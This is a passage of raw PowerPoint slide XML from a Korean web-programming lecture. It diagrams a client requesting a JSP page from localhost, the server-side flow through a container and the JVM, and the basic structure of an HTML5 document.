              <a:gd name="connsiteX12" fmla="*/ 0 w 2965450"/>
              <a:gd name="connsiteY12" fmla="*/ 12065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65450" h="279400">
                <a:moveTo>
                  <a:pt x="2965450" y="279400"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2843946" y="192611"/>
                  <a:pt x="2915823" y="236942"/>
                  <a:pt x="2635250" y="158750"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2602058" y="149500"/>
                  <a:pt x="2568031" y="141992"/>
                  <a:pt x="2533650" y="139700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2440699" y="133503"/>
                  <a:pt x="2347383" y="135467"/>
                  <a:pt x="2254250" y="133350"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2192464" y="125112"/>
                  <a:pt x="2112336" y="113929"/>
                  <a:pt x="2051050" y="107950"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2000315" y="103000"/>
                  <a:pt x="1949450" y="99483"/>
                  <a:pt x="1898650" y="95250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1828800" y="82550"/>
                  <a:pt x="1757505" y="76151"/>
                  <a:pt x="1689100" y="57150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1651000" y="46567"/>
                  <a:pt x="1613429" y="33850"/>
                  <a:pt x="1574800" y="25400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1523483" y="14174"/>
                  <a:pt x="1393704" y="3919"/>
                  <a:pt x="1352550" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="355600" y="31750"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="319099" y="33428"/>
                  <a:pt x="283364" y="43078"/>
                  <a:pt x="247650" y="50800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204999" y="60022"/>
                  <a:pt x="162607" y="70562"/>
                  <a:pt x="120650" y="82550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-120919" y="151570"/>
                  <a:pt x="93864" y="97184"/>
                  <a:pt x="0" y="12065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EF3A857-22A5-CB0A-9BD7-2AAA12D19233}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3829050" y="179705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응답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DA9B531-7EAB-692B-06EF-B72ACB29F11E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715928" y="2078037"/>
            <a:ext cx="2603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응답받은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>을 그려서 보여준다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5397249-9341-D38F-EDB9-C3D020E8240C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5191125" y="4826000"/>
            <a:ext cx="1720850" cy="1250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ECD11CD6-8B45-C919-7398-B3889ABDB2B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8708" y="4597400"/>
            <a:ext cx="806449" cy="6048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7025AB5-D539-41B1-520D-C1441BCA9B6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5626100" y="4438650"/>
            <a:ext cx="175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Container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6637552C-19BF-77C9-E7C5-FD4A516EF95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7727" y="4724400"/>
            <a:ext cx="2385355" cy="13525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B03AEE0-F17A-EA72-12E3-C2FAB59C8C9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726683" y="4438650"/>
            <a:ext cx="133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Client</a:t>
            </a:r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3BAFE59D-5F96-0059-7798-71BE46A3829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24675" y="4818975"/>
            <a:ext cx="268417" cy="25391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0EB39B1-51DC-47B0-979A-3926BF5665FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5823200" y="5015150"/>
            <a:ext cx="455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a.jsp</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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D98319F-EB2F-CB57-86D1-07C30405C795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="894020" y="4747418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http://localhost/a.jsp</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0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xmlns="" id="{8ED8C113-DD8D-8515-D3E5-9CE820B8E350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346450" y="4864100"/>
            <a:ext cx="1524000" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1524000"/>
              <a:gd name="connsiteY0" fmla="*/ 50800 h 114300"/>
              <a:gd name="connsiteX1" fmla="*/ 88900 w 1524000"/>
              <a:gd name="connsiteY1" fmla="*/ 31750 h 114300"/>
              <a:gd name="connsiteX2" fmla="*/ 184150 w 1524000"/>
              <a:gd name="connsiteY2" fmla="*/ 6350 h 114300"/>
              <a:gd name="connsiteX3" fmla="*/ 260350 w 1524000"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 114300"/>
              <a:gd name="connsiteX4" fmla="*/ 1098550 w 1524000"/>
              <a:gd name="connsiteY4" fmla="*/ 6350 h 114300"/>
              <a:gd name="connsiteX5" fmla="*/ 1206500 w 1524000"/>
              <a:gd name="connsiteY5" fmla="*/ 25400 h 114300"/>
              <a:gd name="connsiteX6" fmla="*/ 1282700 w 1524000"/>
              <a:gd name="connsiteY6" fmla="*/ 31750 h 114300"/>
              <a:gd name="connsiteX7" fmla="*/ 1447800 w 1524000"/>
              <a:gd name="connsiteY7" fmla="*/ 76200 h 114300"/>
              <a:gd name="connsiteX8" fmla="*/ 1498600 w 1524000"/>
              <a:gd name="connsiteY8" fmla="*/ 101600 h 114300"/>
              <a:gd name="connsiteX9" fmla="*/ 1524000 w 1524000"/>
              <a:gd name="connsiteY9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000" h="114300">
                <a:moveTo>
                  <a:pt x="0" y="50800"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="29633" y="44450"/>
                  <a:pt x="59440" y="38861"/>
                  <a:pt x="88900" y="31750"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120842" y="24040"/>
                  <a:pt x="151840" y="12333"/>
                  <a:pt x="184150" y="6350"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="209212" y="1709"/>
                  <a:pt x="234950" y="2117"/>
                  <a:pt x="260350" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1098550" y="6350"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1175990" y="7448"/>
                  <a:pt x="1134426" y="14589"/>
                  <a:pt x="1206500" y="25400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1231706" y="29181"/>
                  <a:pt x="1257300" y="29633"/>
                  <a:pt x="1282700" y="31750"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1409372" y="69006"/>
                  <a:pt x="1354036" y="55363"/>
                  <a:pt x="1447800" y="76200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1464733" y="84667"/>
                  <a:pt x="1481365" y="93766"/>
                  <a:pt x="1498600" y="101600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1525354" y="113761"/>
                  <a:pt x="1510742" y="101042"/>
                  <a:pt x="1524000" y="1143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91C19E0-0CF7-7C4B-2D00-A2CAC9AA6A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3759200" y="46736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요청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513A390-A876-8B8D-674A-E0D37FA62BBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3784600" y="50038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응답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1362D21-F62C-D114-D1BB-A1066B85C216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="671478" y="5284787"/>
            <a:ext cx="2603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응답받은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>을 그려서 보여준다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E9790D0-0D60-4143-28F9-67A6E55BC0E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6605842" y="5944950"/>
            <a:ext cx="1549400" cy="91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321ABD1-F0D8-9BC0-FFC4-5129E453B7EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7509000" y="54991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JVM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EE2656D2-F627-61CF-D861-0E7E67F489D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6263334" y="5175250"/>
            <a:ext cx="79855" cy="10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82FDFE05-2BD4-F208-0027-77A69543941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37425" y="5174575"/>
            <a:ext cx="268417" cy="25391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850DB01F-7696-3891-6954-885860EB7364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6235950" y="5370750"/>
            <a:ext cx="5245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a.java</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="105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0A329BFF-6FFC-778C-4E9B-5AB79576CF7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="39" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6498202" y="5624666"/>
            <a:ext cx="188348" cy="5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E9B84C82-562D-2C24-B77C-79E64C0DB32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50175" y="5460325"/>
            <a:ext cx="268417" cy="25391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E509C1F-CCA0-3BE7-B4A3-E0DF80D7265C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648700" y="5656500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a.class</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0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xmlns="" id="{880A45DC-7A80-086D-B0B8-736CC0E3CDFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6756400" y="5892800"/>
            <a:ext cx="304800" cy="412758"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 304800"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 412758"/>
              <a:gd name="connsiteX1" fmla="*/ 57150 w 304800"/>
              <a:gd name="connsiteY1" fmla="*/ 273050 h 412758"/>
              <a:gd name="connsiteX2" fmla="*/ 139700 w 304800"/>
              <a:gd name="connsiteY2" fmla="*/ 336550 h 412758"/>
              <a:gd name="connsiteX3" fmla="*/ 158750 w 304800"/>
              <a:gd name="connsiteY3" fmla="*/ 342900 h 412758"/>
              <a:gd name="connsiteX4" fmla="*/ 184150 w 304800"/>
              <a:gd name="connsiteY4" fmla="*/ 361950 h 412758"/>
              <a:gd name="connsiteX5" fmla="*/ 241300 w 304800"/>
              <a:gd name="connsiteY5" fmla="*/ 387350 h 412758"/>
              <a:gd name="connsiteX6" fmla="*/ 273050 w 304800"/>
              <a:gd name="connsiteY6" fmla="*/ 406400 h 412758"/>
              <a:gd name="connsiteX7" fmla="*/ 304800 w 304800"/>
              <a:gd name="connsiteY7" fmla="*/ 412750 h 412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" h="412758">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="19050" y="91017"/>
                  <a:pt x="28809" y="184485"/>
                  <a:pt x="57150" y="273050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="66705" y="302909"/>
                  <a:pt x="113308" y="324820"/>
                  <a:pt x="139700" y="336550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="145817" y="339268"/>
                  <a:pt x="152400" y="340783"/>
                  <a:pt x="158750" y="342900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="167217" y="349250"/>
                  <a:pt x="175175" y="356341"/>
                  <a:pt x="184150" y="361950"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="211083" y="378783"/>
                  <a:pt x="211192" y="372296"/>
                  <a:pt x="241300" y="387350"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="252339" y="392870"/>
                  <a:pt x="261772" y="401387"/>
                  <a:pt x="273050" y="406400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="288493" y="413263"/>
                  <a:pt x="292636" y="412750"/>
                  <a:pt x="304800" y="4127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08A21E7-07D5-B3C1-FE18-C387079BA6D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7026192" y="6163741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instance</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0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xmlns="" id="{CCBA469E-85BF-841F-7204-10B3624EB46F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6203947" y="5892800"/>
            <a:ext cx="1073153" cy="692150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1073153 w 1073153"/>
              <a:gd name="connsiteY0" fmla="*/ 590550 h 692150"/>
              <a:gd name="connsiteX1" fmla="*/ 1022353 w 1073153"/>
              <a:gd name="connsiteY1" fmla="*/ 673100 h 692150"/>
              <a:gd name="connsiteX2" fmla="*/ 971553 w 1073153"/>
              <a:gd name="connsiteY2" fmla="*/ 692150 h 692150"/>
              <a:gd name="connsiteX3" fmla="*/ 717553 w 1073153"/>
              <a:gd name="connsiteY3" fmla="*/ 654050 h 692150"/>
              <a:gd name="connsiteX4" fmla="*/ 628653 w 1073153"/>
              <a:gd name="connsiteY4" fmla="*/ 590550 h 692150"/>
              <a:gd name="connsiteX5" fmla="*/ 425453 w 1073153"/>
              <a:gd name="connsiteY5" fmla="*/ 361950 h 692150"/>
              <a:gd name="connsiteX6" fmla="*/ 374653 w 1073153"/>
              <a:gd name="connsiteY6" fmla="*/ 304800 h 692150"/>
              <a:gd name="connsiteX7" fmla="*/ 298453 w 1073153"/>
              <a:gd name="connsiteY7" fmla="*/ 196850 h 692150"/>
              <a:gd name="connsiteX8" fmla="*/ 260353 w 1073153"/>
              <a:gd name="connsiteY8" fmla="*/ 152400 h 692150"/>
              <a:gd name="connsiteX9" fmla="*/ 120653 w 1073153"/>
              <a:gd name="connsiteY9" fmla="*/ 82550 h 692150"/>
              <a:gd name="connsiteX10" fmla="*/ 76203 w 1073153"/>
              <a:gd name="connsiteY10" fmla="*/ 50800 h 692150"/>
              <a:gd name="connsiteX11" fmla="*/ 3 w 1073153"/>
              <a:gd name="connsiteY11" fmla="*/ 0 h 69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73153" h="692150">
                <a:moveTo>
                  <a:pt x="1073153" y="590550"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1060323" y="622626"/>
                  <a:pt x="1052937" y="649070"/>
                  <a:pt x="1022353" y="673100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1008133" y="684273"/>
                  <a:pt x="988486" y="685800"/>
                  <a:pt x="971553" y="692150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="886886" y="679450"/>
                  <a:pt x="799639" y="678372"/>
                  <a:pt x="717553" y="654050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="682637" y="643704"/>
                  <a:pt x="655128" y="615554"/>
                  <a:pt x="628653" y="590550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="539766" y="506601"/>
                  <a:pt x="497972" y="446556"/>
                  <a:pt x="425453" y="361950"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="408866" y="342598"/>
                  <a:pt x="389352" y="325623"/>
                  <a:pt x="374653" y="304800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="349253" y="268817"/>
                  <a:pt x="327117" y="230291"/>
                  <a:pt x="298453" y="196850"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="285753" y="182033"/>
                  <a:pt x="275499" y="164706"/>
                  <a:pt x="260353" y="152400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="203907" y="106537"/>
                  <a:pt x="185473" y="116666"/>
                  <a:pt x="120653" y="82550"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104540" y="74070"/>
                  <a:pt x="91598" y="60523"/>
                  <a:pt x="76203" y="50800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-1825" y="1519"/>
                  <a:pt x="3" y="36027"/>
                  <a:pt x="3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A3A4CF1A-D28C-7F66-6A9B-BD41AA2BFB0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42125" y="5612725"/>
            <a:ext cx="268417" cy="25391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050CD445-3BCE-F593-2CE1-E5A47F3DA0A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5740650" y="5808900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x.html</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0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xmlns="" id="{C1F38F8A-D9B6-B04A-87A6-DAFB58FE6C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206750" y="5334000"/>
            <a:ext cx="2603500" cy="336550"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 2603500 w 2603500"/>
              <a:gd name="connsiteY0" fmla="*/ 336550 h 336550"/>
              <a:gd name="connsiteX1" fmla="*/ 2571750 w 2603500"/>
              <a:gd name="connsiteY1" fmla="*/ 317500 h 336550"/>
              <a:gd name="connsiteX2" fmla="*/ 2514600 w 2603500"/>
              <a:gd name="connsiteY2" fmla="*/ 273050 h 336550"/>
              <a:gd name="connsiteX3" fmla="*/ 2336800 w 2603500"/>
              <a:gd name="connsiteY3" fmla="*/ 184150 h 336550"/>
              <a:gd name="connsiteX4" fmla="*/ 2254250 w 2603500"/>
              <a:gd name="connsiteY4" fmla="*/ 171450 h 336550"/>
              <a:gd name="connsiteX5" fmla="*/ 2165350 w 2603500"/>
              <a:gd name="connsiteY5" fmla="*/ 133350 h 336550"/>
              <a:gd name="connsiteX6" fmla="*/ 2038350 w 2603500"/>
              <a:gd name="connsiteY6" fmla="*/ 101600 h 336550"/>
              <a:gd name="connsiteX7" fmla="*/ 1993900 w 2603500"/>
              <a:gd name="connsiteY7" fmla="*/ 95250 h 336550"/>
              <a:gd name="connsiteX8" fmla="*/ 1917700 w 2603500"/>
              <a:gd name="connsiteY8" fmla="*/ 76200 h 336550"/>
              <a:gd name="connsiteX9" fmla="*/ 1835150 w 2603500"/>
              <a:gd name="connsiteY9" fmla="*/ 63500 h 336550"/>
              <a:gd name="connsiteX10" fmla="*/ 1778000 w 2603500"/>
              <a:gd name="connsiteY10" fmla="*/ 50800 h 336550"/>
              <a:gd name="connsiteX11" fmla="*/ 1701800 w 2603500"/>
              <a:gd name="connsiteY11" fmla="*/ 31750 h 336550"/>
              <a:gd name="connsiteX12" fmla="*/ 1606550 w 2603500"/>
              <a:gd name="connsiteY12" fmla="*/ 19050 h 336550"/>
              <a:gd name="connsiteX13" fmla="*/ 1549400 w 2603500"/>
              <a:gd name="connsiteY13" fmla="*/ 6350 h 336550"/>
              <a:gd name="connsiteX14" fmla="*/ 1365250 w 2603500"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 336550"/>
              <a:gd name="connsiteX15" fmla="*/ 412750 w 2603500"/>
              <a:gd name="connsiteY15" fmla="*/ 6350 h 336550"/>
              <a:gd name="connsiteX16" fmla="*/ 266700 w 2603500"/>
              <a:gd name="connsiteY16" fmla="*/ 25400 h 336550"/>
              <a:gd name="connsiteX17" fmla="*/ 120650 w 2603500"/>
              <a:gd name="connsiteY17" fmla="*/ 38100 h 336550"/>
              <a:gd name="connsiteX18" fmla="*/ 82550 w 2603500"/>
              <a:gd name="connsiteY18" fmla="*/ 50800 h 336550"/>
              <a:gd name="connsiteX19" fmla="*/ 0 w 2603500"/>
              <a:gd name="connsiteY19" fmla="*/ 5715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03500" h="336550">
                <a:moveTo>
                  <a:pt x="2603500" y="336550"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2592917" y="330200"/>
                  <a:pt x="2581793" y="324674"/>
                  <a:pt x="2571750" y="317500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2552112" y="303473"/>
                  <a:pt x="2535023" y="285909"/>
                  <a:pt x="2514600" y="273050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2482329" y="252731"/>
                  <a:pt x="2387438" y="197360"/>
                  <a:pt x="2336800" y="184150"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2309861" y="177122"/>
                  <a:pt x="2281767" y="175683"/>
                  <a:pt x="2254250" y="171450"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2224617" y="158750"/>
                  <a:pt x="2195684" y="144270"/>
                  <a:pt x="2165350" y="133350"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2141628" y="124810"/>
                  <a:pt x="2066536" y="106885"/>
                  <a:pt x="2038350" y="101600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2023639" y="98842"/>
                  <a:pt x="2008546" y="98333"/>
                  <a:pt x="1993900" y="95250"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1968280" y="89856"/>
                  <a:pt x="1943373" y="81335"/>
                  <a:pt x="1917700" y="76200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1890400" y="70740"/>
                  <a:pt x="1862541" y="68480"/>
                  <a:pt x="1835150" y="63500"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1815950" y="60009"/>
                  <a:pt x="1796984" y="55320"/>
                  <a:pt x="1778000" y="50800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1752530" y="44736"/>
                  <a:pt x="1727544" y="36517"/>
                  <a:pt x="1701800" y="31750"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1670305" y="25918"/>
                  <a:pt x="1638145" y="24316"/>
                  <a:pt x="1606550" y="19050"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1587301" y="15842"/>
                  <a:pt x="1568854" y="7886"/>
                  <a:pt x="1549400" y="6350"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1488171" y="1516"/>
                  <a:pt x="1426633" y="2117"/>
                  <a:pt x="1365250" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="412750" y="6350"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="342469" y="7223"/>
                  <a:pt x="338191" y="17457"/>
                  <a:pt x="266700" y="25400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-204865" y="77796"/>
                  <a:pt x="395708" y="3718"/>
                  <a:pt x="120650" y="38100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107950" y="42333"/>
                  <a:pt x="95594" y="47790"/>
                  <a:pt x="82550" y="50800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47250" y="58946"/>
                  <a:pt x="34635" y="57150"/>
                  <a:pt x="0" y="5715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8128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CC96504-9D21-FA6B-A913-0A717D5C10E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406400" y="317500"/>
            <a:ext cx="4514377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*HTML5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문서구성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코딩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&lt;!DOCTYPE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&lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>타이틀바에 들어갈 내용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&lt;/title&gt;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사용자에게 보여줄 내용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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저장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파일명</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.html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웹서버 배포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웹서버 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html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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E2BAD3E5-A7CA-95A9-64D0-982D6DCFC445}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3200400" y="2774950"/>
            <a:ext cx="939800" cy="10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B3439F9-A104-53FE-0051-CAC3015F022A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4210050" y="2571750"/>
            <a:ext cx="40049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Tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>를 사용하여 사용자에게 보여줄 내용을 작성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tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>언어</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>시작태그명</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>내용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>끝태그명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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>열림태그</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
